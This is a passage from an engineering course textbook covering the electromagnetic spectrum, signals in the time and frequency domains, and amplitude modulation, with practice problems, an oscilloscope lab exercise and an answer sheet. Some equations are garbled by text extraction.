 Auctions spectrum usage
The FCC controls which portions of the EM spectrum are used for various purposes (e.g. FM radio, AM radio, broadcast TV,
satellite communications). The FCC also makes sure that transmissions do not interfere with each other (two transmitters
physically close to each other transmitting in the same frequency range can destroy each other’s signals). For example,
Washington D.C. can have an FM station that transmits at 101.1 MHz (the FM station called FM101), but Baltimore cannot
have an FM station that transmits at 101.1 MHz because it is too close to the Washington D.C. station (approximately 35
miles away).
Because the spectrum is a non-renewable resource in a society that is increasingly connected it is incredibly precious. To give
you an idea of its value, 400 MHz of spectrum was auctioned by the FCC in 2015 and sold for $44.9 billion dollars!
II.
Signals as a Function of Time and Frequency
Recall that the purpose of a communications system is to transmit information over a distance. The block diagram for a
communication system is again shown below.
Thus far, we’ve covered that during the final section of this course we’re going to focus on free space as our channel or
medium, which means we’re considering the electromagnetic spectrum. Why do we care?
Information can be in various forms. We transmit information in the form of a signal.
A. Signals A signal is a function that conveys information. Signals are considered either analog or digital.
Analog Signals
An analog time-signal is one that is defined along a continuum of times and amplitudes. For example, the
continuous changes in air pressure produced by a vibrating vocal cord or guitar string are examples of analog voice
and music signals, respectively. An analog signal can take on an infinite number of values between a maximum and
a minimum level; that is, the values are from a continuum. Some examples of analog signals are shown below.
444
Digital Signals
A digital time-signal, in contrast, is one that is defined for only discrete values of time and amplitude. Digital signals
change in discrete increments and can be used to represent binary information, such as that used by computers.
Although this is its strict definition, the term “digital signal” is also often used to refer to continuous-time signals
that can take on only a fixed set of states or amplitude values. We will adopt this usage frequently in EC310, and
these are the types of digital signals shown in the figure below. Digital signals will be covered in more detail in
Chapters 21-22.
A simple example of a signal, widely used in both analog and digital communications is a tuning
fork (that is, the sound it produces is its signal).
You can hear the tuning fork, but if you were to look at it graphically as a function of air pressure
over time, you would see a something that looks like this, which is a sine wave at a frequency of
440 Hz.
0.15
0.1
Voltage (V)
0.05
0
-0.05
-0.1
-0.15
0
0.005
0.01
0.015
0.02
0.025
Time (sec)
B. Time Domain (Sine Wave)
Earlier in this chapter, we discussed some basic properties of sinusoidal (electromagnetic) waves. A sinusoidal voltage
waveform can be expressed mathematically in the following way:
vm (t) = Vm sin ( 2p fmt + q )
fm =
1
Tm
Amplitude (Vm) – distance from average to peak (in volts)
Period (Tm) – time to complete one cycle (in seconds)
Frequency (fm) - number of cycles in one second (in Hz)
Phase ( )– Left/right shift with respect to the t = 0 axis (in
radians)
The sine wave is one way to represent the sound the tuning fork makes as a function of time. This is referred to as its “time
domain” representation. If the amplitude of the signal is 2 Volts, then the equation for the tuning fork signal would be:
vm (t) = 2sin(2p 440t) .
This signal can also be represented in terms of its frequency content (i.e., which frequencies are present in the signal) in the
“frequency domain.”
C. Frequency Domain (Frequency Spectrum)
To display a signal in the frequency domain, we determine the frequency content of the signal (which can be done using
Fourier theory or, for this class, when the signals we will analyze are composed of sinusoids it can be done by inspection).
The frequency content is then displayed on a plot of magnitude vs. frequency. (magnitude is the absolute value of amplitude).
Since our tuning fork is a very simple tone with a single frequency component of 440 Hz and an amplitude of 2V, the
frequency domain plot looks like this:
445
Both the time-domain (sine wave) and the frequency-domain displays represent the important characteristics of the tuning
fork as far as a communication system is concerned– they’re just different ways to express the same signal. For
communication engineers, the primary interest is what portion of the frequency spectrum does the signal occupy and how
strong is the signal (magnitude); for our purposes, phase offset (if present) is not part of the frequency plot.
Suppose we had a slightly more complicated signal. Suppose
vm (t) = 2sin ( 2p 440t ) - 3sin ( 2p 900t + p 4 ) + 5cos ( 2p1100t - 2p 7 ) .
In this case, there are three sinusoids (i.e., there are three frequencies in the
signal) so the frequency plot will have three spikes, at the three frequencies
given, with heights corresponding to the magnitudes of the amplitudes given.
Again, the phases shown are not a part of this plot.
Part of the benefit of a frequency domain representation is that certain signal
attributes, like bandwidth, are easy to visualize. For instance, in the above
graph, you can quickly see the bandwidth is 1100 Hz – 440 Hz = 660 Hz.
446
Problems
1.
What is the purpose of a communications system? Draw and explain the components.
2.
What part of the electromagnetic spectrum (frequency range) is visible to humans?
3.
Find 5 major uses of the UHF band (Use a book or the Internet to find your answer).
4.
Calculate the frequency of signals with the following wavelengths:
6.
30 m
b.
2 km
c.
8 cm
AM Radio
a.
What is the frequency range used by AM radio broadcast stations?
b.
What is the bandwidth (BW) occupied by each station?
Given the sine wave below, answer the following questions:
Amplitude (V)
5.
a.
4
3.75
3.5
3.25
3
2.75
2.5
2.25
2
1.75
1.5
1.25
1
0.75
0.5
0.25
0
-0.25
-0.5
-0.75
-1
-1.25
-1.5
-1.75
-2
-2.25
-2.5
-2.75
-3
-3.25
-3.5
-3.75
-4
0
0.01
0.02
0.03
0.04
0.05
0.06
0.07
0.08
0.09
0.1
time (msec)
a.
What is the period of this signal?
b.
What is this signal’s amplitude?
c.
What is the frequency of this signal?
d.
In which range of the electromagnetic spectrum would this signal be classified?
e.
What is the wavelength of this signal?
f.
Sketch this signal in the frequency domain.
447
0.11
0.12
0.13
0.14
0.15
7.
Given the following equation for a signal, sketch the frequency plot. Put your frequency axis in kHz.
vm (t) = -18sin ( 2p 44,000t ) +13sin ( 2p150 ´10 3 t - 6p 11) + 7cos ( 2p 30 ´10 4 t + p 21)
8.
Given the following plot, write the equation for one signal that has this as its frequency plot (note: there is not one single
answer).
448
Security Exercise 19
Introduction to Signals in the Time and Frequency Domains
PART I: INTRODUCTION & SINUSOIDAL SIGNALS
Check-off each step as you complete it.
Step One: Function generator setup.
□
□
□
□
Turn on power to the lab bench . The power switch is on the right side of the lab bench and is labeled "120 V
OUTLETS." The switch should be in the raised position if power is on.
Locate the "10MHz Function/Arbitrary Waveform Generator" on the lab bench
and turn the power on. We will refer to this equipment as simply the "function generator."
Select the sinusoidal function by pressing the button with the Sine wave on it. The function
generator display should indicate a small sine wave.
Turn any other lit buttons off.
As the name implies, the function generator is able to generate electrical signals. For this lab we will use the function
generator to generate sinusoidal voltage waveforms.
We will set the frequency to 1.75 kHz using the key pad method.
□
□
□
Select the Frequency (Freq) function using the soft keys under the display
screen.
Enter the desired frequency (1.75) using the key pad.
Enter the desired units (kHz) by pressing the button under kHz on the
screen.
We will set the size of the waveform to 10 Vpp (volts peak-to-peak) using the key
pad method.
□
□
□
□
□
Select the Utility function and then select the Output Setup soft key. Check that
High Z is highlighted. If not, push the Load/High Z button until it is highlighted.
Push Done.
Select the Amplitude (Ampl) function using the soft keys under the display screen.
Enter the desired amplitude (10) using the key pad.
Enter the desired units (Vpp) by pressing the button under Vpp on the screen.
Press the output button. It should now be lit indicating the function generator is producing an
output.
Right now your function generator is generating a 1.75 kHz signal that has a peak-to-peak voltage of 10V. But…that signal
is not leaving the function generator. To see the signal, we will send the output of the function generator to an oscilloscope.
Proceed to Step Two!
Step Two: Oscilloscope familiarization.
449
□
Locate the oscilloscope at the top of your lab bench and turn its power on. The power push button is located on the
top left of the oscilloscope.
The oscilloscope can receive electrical signals from two probes, channel 1 (CH 1)
and channel 2 (CH 2). We have attached adaptors to CH 1 and CH 2, so that they
can receive electrical signals via our banana plug cables.
□
□
Locate the CH 1 input on your oscilloscope. It will have a two-input (RED / BLACK) banana plug adaptor
installed.
Connect banana plug cables (which can be found under the bench on the plastic Quad board) from the function
generator’s output to the CH 1 input on the oscilloscope (connect red-to-red and black-to-black).
The oscilloscope has the ability to measure and display two different electrical signals, but only with respect to one common
reference point. The BLACK CH 1 input provides this common reference point (ground) for both CH 1 and CH 2.
Therefore, CH2 has an adaptor for only one banana plug. We will not be using CH2 for this lab.
Before looking at our sine wave on the scope in detail, let's first pause and look at a generic display which explains how the
information on the oscilloscope screen is presented. Your screen will not look like the screen shown in Figure 1 below!
In the figure below, we see that the oscilloscope display is divided up into eight major vertical divisions. The bottom left
corner of the oscilloscope—where you see "CH1 100mV"—indicates the number of volts per division for a given channel.
You can see that CH 1 and CH 2 indicate 100mV per division, therefore each major division in the vertical axis represents
100mV.
Similarly there are ten major divisions on the horizontal axis that represent time. Each major division on the horizontal axis
of the display represents 250μs. CH1 and CH 2 can have different Volts/Div, but will always share the same Sec/Div.
Step Three: Display your sine wave with the oscilloscope.
□
Press the AUTOSET button( top right) on the oscilloscope. AUTOSET will
measure the input signals for the channels selected and attempt to display
something meaningful.
450
□
□
□
□
□
With the CH 1 menu selected, adjust the position of the vertical axis zero level by rotating the vertical position knob
in the CH 1 column, so that the “1→” on the left side of the display is adjacent to the major horizontal axis (centered
vertically on the display).
If needed, press the CH2 Menu button twice to turn off the CH 2 trace, since
nothing is connected to CH 2 for this lab (CH 2 is displaying background noise).
Press CH 1 MENU on the oscilloscope and make the following settings.
 Coupling: AC
 BW Limit: OFF
 Volts/Div: COARSE
 Probe: 1X
 Invert: Off
Adjust the VOLTS/DIV knob under the vertical section
in the CH 1 column, so that CH 1 indicates 2 Volts/Div
on the bottom left corner of your display.
Adjust the SEC/DIV knob under the horizontal axis, so
that the oscilloscope indicates 100 s per major division
on the LCD on the bottom middle of your display.
Step Four: Measuring the waveform on the oscilloscope.
Manual method. The first method is by counting the divisions
of grid and applying the scale (volts/div for vertical, or sec/div
for horizontal). This will only provide you with approximate values with little precision.
Question 1. Fill out the table on your answer sheet using this manual measurements method. Specifically:
□ Using the vertical scale, determine the peak-to-peak voltage on CH1 which is the total voltage from positive peak to
negative peak. That is, you should count the number of vertical divisions from peak to peak, and multiply the
number of divisions by the number of volts/division.
□
From your measured Vpp, determine the amplitude of the signal (Vm).
□
Using the horizontal scale, determine the period (Tm) and then calculate the signal's frequency. That is, you should
count the number of horizontal divisions for one full cycle, and then multiply the number of divisions by the number
of microseconds (in this case) per division.
Taking measurements with cursors. The oscilloscope has time and amplitude cursors that you can move on the plot to help
take measurements of voltage, period and frequency.
□
□
□
□
□
□
Press the Cursor button (top middle) to view the cursor menu on LCD.
Then choose the Type of cursor to be Amplitude by cycling through the options on the button associated with this
menu option. Two horizontal cursors will now appear that are moveable.
Choose the Source to be CH 1. Two cursors are now available for you to move around the display. Push Cursor 1 to
move the first cursor, and Cursor 2 when you want to move the second cursor. The cursors are moved using the
large knob next to the green power-on light.
Place cursor 1 at the sinusoid’s maximum voltage, and cursor 2 at it’s minimum. The ΔV value (which is the voltage
difference between the two cursors) can be read out on the right side of the display…this is the peak-to-peak
voltage.
Then choose the Type of cursor to be Time by cycling through the options on the button associated with this menu
option. Two vertical cursors will now appear that are moveable.
Adjust the two time cursors to allow you to measure the period of the sinusoid.
Question 2. Fill out the table on your answer sheet the using cursor measurements method.
Taking automatic measurements. The oscilloscope has the ability to take automated measurements of voltage, period and
frequency.
451
□
□
□
□
□
Press the Measure button (top middle) to view the measurement menu on LCD, then push the top menu box button
to highlight Source and select CH1 for Measure 1.
Then choose the Type of measurement to be Pk-Pk by cycling through the options on the button associated with
this menu option, and then hit button for Back option
Press the second to top menu box button to select Measure 2.
Then choose the Type of measurement to be Freq by cycling through the options on the button associated with this
menu option, and then hit button for Back option
You can add new measurements for all 5 buttons. Amplitude is not automatically measured but can still be
calculated from the peak-to-peak voltage as before. Record your results in Question 2.
Question 3. Fill out the table on your answer sheet using the automatic measurements method.
Consider how you would describe your sinusoidal signal as an equation:.
The phase describes the start of one signal relative to another, so we will assume the phase is zero.
Question 4. The equation for a sine wave is vm (t) = Vm sin(2p fmt + q ) . Write your equation for the sinusoid based on your
measurements from the previous pages.
Step Five: Measuring a pure sine wave in the frequency domain.
Our scope can also provide a frequency spectrum of a signal. For this particular sinusoidal signal we know it is periodic and
has a single frequency, fm, described by the previous measurements and shown in our equation.
Now let us see how this signal is displayed in the frequency domain.
The oscilloscope performs a Fast Fourier Transform (FFT) and displays the magnitudes of the frequencies present in the
signal vs. frequency, so the horizontal scale shows frequency (in Hz) instead of time.
□
□
□
Press AUTOSET (top right) and you will see the options to display the signal in time or in frequency (FFT).
Push the button next to the FFT and you will see a spike at a particular frequency.
Set the horizontal scale to read 250Hz per division by turning the Sec/Div knob.
At this point, you should see one large spike in the display (which corresponds to the sinusoidal signal from CH1, and also
many smaller spikes scattered throughout the frequency spectrum (this is noise). Your concern is the large spike.
Question 5. The left edge of the display is 0 Hz, and frequency increases from 0 Hz as you move to the right. Determine the
value of the frequency component ( fm= ?) by counting the number of horizontal divisions and multiplying that by the number
of Hz per division.
You can check your answer using the frequency cursor:
□ Press the Cursor button (top middle) to view the cursor menu on LCD.
□ Choose the Source to be MATH (note: this is because the FFT is a mathematical computation).
□ Then choose the Type of cursor to be Frequency. Two vertical cursors are now available for you to move around
the display. Push Cursor 1 to move that cursor, and place it on the largest spike. The readout of frequency will be
displayed on the right side of the LCD.
Question 6. Sketch your frequency plot (as seen on the oscilloscope) and label the axes with your values. Include the smaller
noise spikes. Have your instructor check it. Note: this oscilloscope displays amplitude of the frequency content in decibels
(dB) vice volts, as you have been taught. The default vertical scale is 10 dB per vertical division, and the bottom of the scale
is 0 dB, so label the vertical axis accordingly. Use the Amplitude cursor on the FFT plot to determine the heights of the
spike.
PART II: PUTTING YOU TO THE TEST—UNKNOWN SIGNALS
So…are you comfortable using the function generator and the oscilloscope? Let's find out!
452
Your instructors have pre-set two different sinusoidal signals into the function generator. Your goal is to determine the
amplitude and frequency of each.
□
□
□
Reset the Oscilloscope back to the time domain from the frequency domain, by pressing the Autoset button and then
selecting the button next to the multiple cycles of a sinewave (at the top, above the FFT button). (If the pesky
Channel 2 display is active, hit CH2 Menu twice.)
Ask your Instructor/Lab Tech to enter Challenge Signal 1. You will find this challenging because it is named
"Challenge Signal 1."
Push AUTOSET on the Oscilloscope.
Determine the amplitude and frequency of the sine wave. Obviously you should use only the oscilloscope (do not try to
finagle with the function generator, pushing various buttons to see if it will cough up the answer!) Use only the oscilloscope!
Place your answers in Question 7. Show your instructor or lab tech before continuing.
□
□
Ask your Instructor/Lab Tech to enter Challenge Signal 2. You will find this challenging because…well…you
know.
Push AUTOSET on the Oscilloscope.
Determine the amplitude and frequency of the sine wave. Use only the oscilloscope!
Place your answers in Question 8. Show your instructor or lab tech before calling it a day.
PART III: IT'S A WRAP!
□
□
□
□
Unplug and stow the banana plug cables.
Turn off your oscilloscope.
Turn off your function generator.
Pat yourself on the back for your cyber expertise.
453
454
Security Exercise 19 Answer Sheet
Name:
__________________________________________________________________________________________
Question 1:
Peak-to-peak (Vpp)
Amplitude (Vm)
Period (Tm)
Frequency (fm)
Peak-to-peak (Vpp)
Amplitude (Vm)
Period (Tm)
Frequency (fm)
Peak-to-peak (Vpp)
Amplitude (Vm)
Period (Tm)
Frequency (fm)
vm(t) (CH1)
Question 2:
vm(t) (CH1)
Question 3:
vm(t) (CH1)
Question 4:
vm(t) =____________________________________ ( Show values)
Question 5:
Question 6:
__________________________________
Instructor / Lab Tech
Question 7:
Question 8:
Amplitude:
__________
Frequency:
__________
Amplitude:
__________
Frequency:
__________
___________________
Instructor / Lab Tech
____________________
Instructor / Lab Tech
455
456
Chapter 20: Intro to Modulation
Objectives:
(a) Define the term baseband signal and describe some potential limitations associated with transmitting baseband signals
directly.
(b) Discuss the role of modulation in signal transmission and the methods of modulating a sinusoidal carrier.
(c) Using a plot of an AM signal, determine Vmax, Vmin, Vm, Vc and m.
(d) Create a frequency plot for and determine the sidebands and bandwidth of an AM signal where the information signal
consists of one or more distinct sinusoids.
(e) Determine the condition for overmodulation in an AM signal, and the consequence of overmodulation.
Connection to Cyber Security
In Chapter 19, we defined a communications system and learned that the wireless section of EC310 will focus on
communications in which the communication channel is free space.
We also learned that in order to send any information through a communications system it must be in the form of a signal
(which is the name given to the function that conveys our information), and if our communication channel is free space, it
means we’re dealing with signals carried in the Electromagnetic Spectrum (EM). Finally, we learned that signals can be
represented as a function of either time or frequency. Wireless channels have different vulnerabilities than we saw in the host
section of the course, because of the frequency of transmission. It is possible that a wireless network can be attacked like we
saw in the networks section of the course, but to see how such a cyber attack can be carried out on a wireless network or a
wireless communication in general, you must first understand how information is carried through the wireless channel.
1. Baseband Signals
If you’re sitting in your EC310 classroom in the basement of Rickover Hall and you speak to the student next to you, will that
person be able to hear you? Will you be heard across the room? How about at the end of that loooong Rickover
passageway? Does anyone in Bancroft have a chance of hearing what you’re grumbling about in your EC310 classroom?
Why not? Your voice doesn’t travel as far as you might like it to—your voice creates pressure waves in the air, and the
strength of these waves attenuates over distance. The louder you yell the farther you’ll be heard, but this of course has its
limits. As an alternative to walking around screaming all day, you might consider speaking at a more normal volume into a
microphone. A microphone is a device that transforms sound pressure waves into electrical signals. You could then send the
electrical output of the microphone to an antenna. Then your voice frequencies would travel as electromagnetic waves
(“radio waves”), and as long as you provided enough power to the antenna, you could presumably greatly extend the
geographic range of your EC310 musings. In this chapter, we’ll see that the latter approach is on the right track, but in order
to be practical, it requires a bit more finesse.
In this example our voice signal, which you’ll recall is comprised of frequencies roughly in the range between 300 Hz and 3
kHz, is what we call a baseband signal. Baseband signals are information signals at their original frequencies, typically low
frequencies. To transmit a baseband signal directly as is, we use baseband transmission…as you’ll see in shortly,
communication systems typically will upshift the frequency spectrum of baseband signals to a higher range of frequencies to
allow transmission through the atmosphere.
In general, before signals can be transmitted effectively, they must first be converted to a form that is compatible with the
communication medium. One facet of this conversion is transducing the signal from its natural physical form into an electrical
signal. For example,
 Microphones convert acoustic pressure waves (sound) into electrical signals.
 Video cameras convert light patterns into electrical signals.
 Computer keyboards convert physical input (typing) into an electrical signals.
But, as alluded to above, even after converting your voice signal to, say, a voltage signal using a microphone, attempting to
transmit it over the air as a baseband signal is impractical. Why? Let’s look at an example that will point us in the right
direction.
457
Practice Problem 20.1
Physics dictates that antenna length is intrinsically tied to the wavelength of the signal it is transmitting or receiving. To transmit
a signal through the atmosphere with an antenna efficiently, the length of the antenna must be at least a tenth of a wavelength
long.
What is the approximate length of the antenna required to transmit the sound of a tuning fork (which creates musical note A =
440 Hz)? Note: this sound must be transduced into an electrical signal first before it is transmitted.
Wait! To transmit that lousy tuning fork signal my antenna needs to be at least 68 km? That’s over 42 miles! We’d need an
antenna that extends into the upper parts of the atmosphere for that. Clearly, that’s not going to work.
Well, I know that if I want to listen to the Navy game on the radio (because for some
reason I avoided the mandatory fun), I can tune in to AM radio station 1430 WNAV.
Recall that from Chapter 19, when referring to a commercial AM radio station, such as
1430 WNAV, that the 1430 refers to the center of its transmission frequency in kHz.
So what size antenna does WNAV use?
Practice Problem 20.2
(a) What is the wavelength of an AM radio station whose transmission frequency is 1430 kHz?
(b) What is the approximate antenna length if the station uses an antenna that is half the wavelength long?
105 meters? Okay, that’s still big – it’s about 115 yards - almost an entire football field… but at least you don’t need an
antenna that reaches into outer space now. In reality, WNAV’s antenna, pictured at right, is 117 meters. We’re close!
The purpose of those two examples was to
demonstrate that we need to somehow get our
baseband information to a higher frequency
(shorter wavelength) in order to be able to
transmit it across our channel. Higher
frequencies give us reasonable antenna sizes
plus some added benefits: first, signals will
attenuate less quickly if the higher frequencies
are well-chosen. Second, multiple people whose voices all occupy the same baseband
frequencies - can communicate without
interfering if each transmits on a different
higher frequency range. We can shift
baseband information to higher frequencies
for transmission using a process called
modulation.
458
2. Modulation
To overcome limitations of the communications channel and permit multiple access, information signals are impressed upon
a higher-frequency carrier signal for transmission. This process is called modulation. Now we’re dealing with two signals:
1. Original (“baseband”) information signal - frequency is too low to transmit efficiently
2. Higher frequency (“carrier”) signal - we can transmit this efficiently, so we use it to carry our information
Mathematically,
representing the higher-frequency carrier is given by:
the
sine
wave
vc (t) = Vc sin(2p fc t + q )
Modulation is the process of varying any of three properties (amplitude, frequency or phase) of a high-frequency carrier using
the lower-frequency information signal (baseband signal). A modulator is a component of a communication system which
achieves modulation. The three types of modulation we will focus on are:

Amplitude modulation (AM) – Varying the amplitude Vc of the carrier with the info signal.

Frequency modulation (FM) – Varying the frequency fc of the carrier with the info signal.

Phase modulation (PM) – Varying phase angle of the carrier with the info signal.
Since the intention of the “Wireless” section of EC310 is to give you a broad understanding of wireless communication
techniques rather than to make you communication engineers, we’re only going to go into more detail with amplitude
459
modulation (AM) in this chapter. This is NOT to say that frequency modulation and phase modulation are unimportant –
they’re very important and very widely used. The fact is that there’s only so much modulation that can be reasonably covered
in the last several chapters of this course, and AM is the easiest to visualize and demonstrate. Later, in Chapter 22: Digital
Modulation, we will again address amplitude, frequency and phase modulation to some extent as they apply to digital
communications.
3. Amplitude modulation (AM)
In amplitude modulation, the information signal is used to vary the amplitude of the carrier sine wave. For simplicity,
consider a sine wave information signal, vm(t) (a 440 Hz tuning fork) and a sinusoidal carrier, vc(t) (frequency 5000 Hz (5
kHz)).
vm (t) = Vm sin ( 2p fmt ) = Vm sin ( 2p 440t )
The diagram of an amplitude modulation system using this information signal follows.
The AM wave (vAM(t)) is the product of the carrier (with amplitude = 1) with a modulating signal. The modulating signal is
the information signal vm(t) with an added offset, Vc. The AM signal is then given by:
In the figure below, the top plot is of the information signal and the bottom is the resulting AM signal. Note that the
information signal starts at a value of zero (for approximately 2 msec), so the resulting AM signal is the unmodulated carrier
signal (meaning that the carrier is not being modulated). When the information signal is no longer zero, it starts to modulate
the carrier’s amplitude as shown.The horizontal axes are time in msec. The information signal is equal to zero at the
beginning, then changes to the tuning fork sine wave at approximately 2 msec. Here, the carrier and information signal
parameters are: fc(t) = 5 kHz, Vc = 10V, fm(t) = 440 Hz, Vm = 7.5V.
460
A zoomed-in plot of the resulting modulated AM signal is as follows, showing the graphical relation between Vm and Vc:
The envelope of the modulating signal (which is drawn onto the AM signal below in a dashed red line) varies above and
below the unmodulated carrier amplitude, Vc. It is the envelope that carries the information signal; the receiver must separate
the envelope from the received AM signal to recover the information that was transmitted. In this case, the envelope is in the
shape of a sine wave, which is the same as the information signal. The values of Vm and Vc are related by the modulation
index (m).
Modulation Index
The relationship between the information signal amplitude, Vm , and the unmodulated carrier amplitude, Vc , is expressed as a
ratio called the modulation index (m), defined as:
m
Vm
VC
Sometimes m is expressed as a percentage: percent modulation = m x 100%. The following figure shows the AM signal at
three different values of percent modulation: 20%, 50% and 90%. Overall, the greater the value of m, the closer the envelope
gets to the horizontal (time) axis.
461
We can also mathematically determine the modulation index m from the maximum and minimum values of the envelope of
vAM(t) as follows, where Vmax is the maximum value of the envelope and Vmin is the minimum value:
Vmax  Vmin
2
Vmax  Vmin
Vc 
2
V
V  Vmin
m  m  max
Vc Vmax  Vmin
Vm 
In order for the AM signal to convey the original signal accurately and prevent distortion, the information signal amplitude
(Vm) must be less than the unmodulated carrier signal amplitude (Vc). Here again, the unmodulated carrier refers to the AM
signal if the information signal amplitude is equal to 0 (Vm = 0), in which case, vAM (t) = Vc sin(2p fct) . The maximum usable
modulation index is m = 1.0, corresponding to 100% modulation, when Vm is equal to Vc. When Vm is greater than Vc (that is,
m > 1), overmodulation occurs. Overmodulation, depicted below, results in distortion of the AM signal’s envelope, and since
the envelope holds the information, the recovered information signal is also distorted.
462
Practice Problem 20.3
If a carrier signal vc(t) = 9 sin(25000t) Volts is modulated by a sine wave vm(t) =7.5 sin(2440t) V, what is the percentage
modulation of the resulting AM signal?
Now that we have a basic understanding of how Amplitude Modulation works in the time domain, let’s look at AM in the
frequency domain.
4. AM in Frequency Domain
Recall the equation for the amplitude modulated waveform if the information signal is a single sine wave is given by:
vAM (t) = (Vc +Vm sin(2p fmt)) sin(2p fct) . We already know the frequency domain representations of the modulating
signal (vm(t)) and the carrier signal (vc(t)), but how does the amplitude modulated signal look in the frequency domain?
To answer this question, recall the trig identity for the product of two sine waves:
sin Asin B = 12 cos( A- B) - 12 cos( A+ B)
Applying this trig identity for product of two sine waves to the AM signal results in:
vAM (t) = (Vc + Vm sin ( 2p fm t )) sin ( 2p fct )
= Vc sin ( 2p fct ) + Vm sin ( 2p fct ) sin ( 2p fmt )
= Vc sin ( 2p fct ) +
Vm
V
cos ( 2p ( fc - fm ) t ) - m cos ( 2p ( fc + fm ) t )
2
2
This means that when a single sine wave information signal is used to modulate the carrier in AM, the resulting AM signal
contains three sinusoids: one at the carrier frequency, one fm Hz below carrier frequency, and one fm Hz above the carrier
frequency. For the tuning fork example, we have: fc = 5 kHz, fc − fm = 4.560 kHz and fc + fm = 5.440 kHz. The trig identity puts
the amplitudes at frequencies fc − fm and fc + fm at one half that of Vm.
This means the resulting frequency domain plot for this tuning fork example looks like the following (note that the plot
shows the magnitude of the frequency content, so the negative cosine amplitude shows up as positive-going spikes on the
plot):
463
The process of modulating a carrier creates an upper and a lower sideband that is apparent in the frequency plot. The lower
sideband (or LSB) is that portion of the transmitted signal that has frequency content less than the carrier frequency, and the
upper sideband (or USB) has frequency content greater than the carrier frequency. For the tuning fork example, the USB is
the 5440 Hz cosine, and the LSB is the 4560 Hz cosine. On a frequency plot of an AM signal, the lower sideband is a mirror
image of the upper sideband centered about the carrier frequency.
What is the AM signal’s bandwidth? Since bandwith is the highest transmitted frequency minus the lowest frequency
transmitted, it is (fc + fm) − (fc − fm) = 2 fm = 880 Hz. This is twice the bandwith of the information signal we started with…if
we didn’t modulate the information signal, the transmission bandwidth would have only been fm (440 Hz in this case)43. This
means that by transmitting with AM, we have doubled the required bandwith to transmit the signal. Why is this a concern?
Bandwidth is the #2 limiting factor in communications systems, and can be expensive to use… so we’re going to want to
send as much information as possible while occupying the minimum amount of bandwith possible.
Let’s look at a slightly more complex example – suppose the information signal was comprised of two sine waves:
vm (t) = V1 sin(2p f1t) +V2 sin(2p f2t)
What does the AM signal look like? Again, we apply the same trig identity to each sine in the information signal, resulting in:
vAM (t) = (Vc + vm (t)) sin ( 2p fct )
= (Vc + V1 sin ( 2p f1t ) + V2 sin ( 2p f2t )) sin ( 2p fct )
= Vc sin ( 2p fct ) + V1 sin ( 2p fct ) sin ( 2p f1t ) + V2 sin ( 2p fct ) sin ( 2p f2t )
= Vc sin ( 2p fct ) +
V1
V
cos ( 2p ( fc - f1 ) t ) - 1 cos ( 2p ( fc + f1 ) t )
2
2
V2
V
+ cos ( 2p ( fc - f2 ) t ) - 2 cos ( 2p ( fc + f2 ) t )
2
2
The net result is that for each sine in the message, we will wind up with two cosines in the AM signal: one will have a
frequency greater than the carrier frequency, one will have a frequency less than the carrier frequency. The bandwidth is still
equal to the highest frequency in the AM signal minus the lowest frequency. This is equal to two times the max frequency in
the information signal. That is, if fmax is the maximum of the two frequencies in the information signal (either f1 or f2), then
the AM bandwidth is BW = 2 fmax.
Practice Problem 20.4
Suppose we want to transmit the sound of a two chime doorbell (f1=349 Hz, f2= 440 Hz) using VLF (very low frequency)
communications (let fc = 20 kHz). Each of the chimes has an amplitude of 10V, and the carrier’s amplitude is 20V. Sketch the
frequency domain representation of the transmitted signal and determine the bandwidth.
Which of the two chime frequencies determines the bandwidth?
2
The bandwidth of a baseband signal is considered to be its maximum frequency content. In this case, if the message is a single sinusoid at
a frequency of fm Hz, we say its bandwidth is fm Hz.
464
Practice Problem 20.5
If a carrier signal vm (t) = 20sin ( 2p 5000t ) Volts is amplitude modulated by information signal
vm (t) = 4sin ( 2p 200t ) - 6cos ( 2p 400t + 411p ), sketch the frequency plot for the resulting AM signal and calculate the
transmission bandwidth.
An example of an even more complicated signal is the signal created by recording an oboe (the musical instrument) playing a
single note. When someone blows into the mouthpiece of an oboe to play a note, their fingers are placed over certain holes to
create the note. Because of the structure of the oboe (its length, diameter and placement of the holes for example), the sound
the instrument makes is actually a combination of a number of tones (sinusoids) with different amplitudes. Different
instruments can all play the same note, but each instrument will sound differently because the structure of the instrument
produces different sinusoids with different amplitudes. Amplitude modulation of an oboe playing the note Concert A is
demonstrated on the next figure. In this figure, the maximum frequency present in the note is approximately 4 kHz, so the
bandwidth of the AM signal is BW = 2 fmax = 2 (4 kHz)= 8 kHz.
Other common information signals, such as voice or music, are composed of many different frequencies. AM modulation still
works the same way, but in order to compute transmission bandwidth, we again compute it as BW = 2 fmax. Again, here, fmax
is the maximum frequency content present in the information signal.
5. Demodulation
Modulation is used to upshift the frequency content of a baseband signal, to facilitate transmission (e.g., to allow a smaller
antenna). Demodulation is performed in the receiver to downshift that frequency content back to its baseband frequency. For
example, if the 440 Hz tuning fork signal were transmitted on Annapolis AM radio station WYRE 810AM (fc = 810 kHz), the
transmitted signal is at a frequency of approximately 810 kHz, which is well outside our hearing (we can hear signals with
frequency content up to approximately 20 kHz). In order to hear the tuning fork signal, our car’s radio receiver must shift the
frequency content back down to its original range (440 Hz). This is demodulation; it basically “undoes” what modulation did
to the information signal. How demodulation works is beyond the scope of this course, but you should be aware of its
importance in a communication system.
What’s the point? AM is by no means the only form of modulation (though it’s probably the easiest to work through and
visualize). The intent of this course is not to make you all communications engineers, but you do need to have enough
background in modulation to understand the implications (especially with regard to bandwidth) moving forward. You’ll see
this again in a few lessons, with digital applications.
465
466
Problems
1.
(a) Calculate the wavelength of signals with frequencies of 1.5 kHz, 18 MHz, and 22 GHz.
(b) Since an antenna that is needed to transmit these frequencies must be at least a tenth of the wavelength, which signal
frequency would NOT be practical for direct (i.e., baseband) transmission?
(c) Name and define a technique that could be used to transmit the frequency in part (b).
2. An AM signal is comprised of the following two signals:
vm(t) = 80 cos (2π5000t) volts
vc(t) = 100 cos (2π800,000t) volts
where vm(t) is the message and vc(t) is the “unmodulated carrier” (i.e., the output of the modulator when
information signal is present).
no
(a) Find the carrier frequency, the upper-sideband and lower-sideband frequencies, and the percent modulation (m).
(b) Suppose vm(t) changes to 120 cos(2π5000t). Find the new percent modulation (m). Give the technical term for this
condition and explain the effects of this condition occurring.
3.
A radio station, 1280AM, is conducting a monthly test of the Emergency Alert System. The test begins with an
annoying sound comprised of two pure tones at 853 Hz and 960 Hz. The signal being broadcast has exactly five
frequency components, i.e., the signal could be written as follows:
vAM(t) = V1 sin(2π f1 t) + V2 cos(2π f2 t) - V3 cos(2π f3 t) + V4 cos(2π f4 t) - V5 cos(2π f5 t) volts
(a) Find the five frequencies that comprise the AM signal being broadcast. Recall that the carrier frequency and the two
